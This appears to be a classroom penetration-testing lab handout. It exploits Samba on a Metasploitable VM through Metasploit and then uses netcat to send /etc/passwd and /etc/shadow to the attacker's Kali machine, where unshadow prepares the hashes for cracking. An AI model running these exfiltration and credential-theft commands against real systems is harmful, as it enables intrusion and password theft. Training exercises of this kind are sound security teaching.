Samba is a free software implementation of the SMB networking protocol. It provides file and print services for various systems. It runs on most Unix-like systems such as Linux, Solaris, AIX etc.
In this Lab, you will be exploiting the Samba implementation on Metasploitable as well as use netcat to exfiltrate data.
Ensure that both the Kali and the metasploitable machines are powered on and on the same network. Verify connectivity between them by using the ping command.
-
Run nmap against the metasploitable machine using the following command.
sudo nmap -sV <metasploitable IP> -vvv
(make a note of open ports and services).make a note of what port Samba is running.
-
On your Kali machine launch the metasploit framework.
-
Search for Samba exploits based on version identified in nmap results.
msf6> search type:exploit name:samba
-
Select the exploit matching the version (note that the search option may not provide a lot of information so you will likely have to try multiple exploits to make it work).
-
Select the exploit by using command below.
use exploit/xxxxx
-
Set required options by using set command (hint RHOSTS, and possibly payload).
-
Execute the exploit (this should open a session on the exploited host).
-
Open another Kali terminal window.
-
Launch netcat in a listen mode and redirect output to a file as shown.
nc -l -p 4567 > passwd.txt
-
From the exploited system terminal (session opened from metasploit exploit you executed) type the following commands to extract the
/etc/passwd
file.cat /etc/passwd | nc <kali ip> 4567
(there will be no progress bar and there should be no error messages).go back to the listening netcat window and terminate it using CTRL+C. Cat the contents of the
passwd.txt
file using command below.cat passwd.txt
-
Start another
netcat
command but redirect the contents toshadow.txt
instead ofpasswd.txt
(use the same command as in Step 9 just changepasswd.txt
toshadow.txt
). -
From the exploited system terminal (session opened from metasploit exploit you executed) type the following commands to extract the
/etc/shadow file
.cat /etc/shadow| nc <kali ip> 4567
(there will be no progress bar and there should be no error messages).go back to the listening netcat window and terminate it using CTRL+C. Cat the contents of the
passwd.txt
file using command below.cat shadow.txt
-
On your kali box combine the contents of
passwd.txt
andshadow.txt
using the command below.unshadow passwd.txt shadow.txt > user_logins.txt
-
What is the content of the combined
user_logins.txt
file (include screenshot).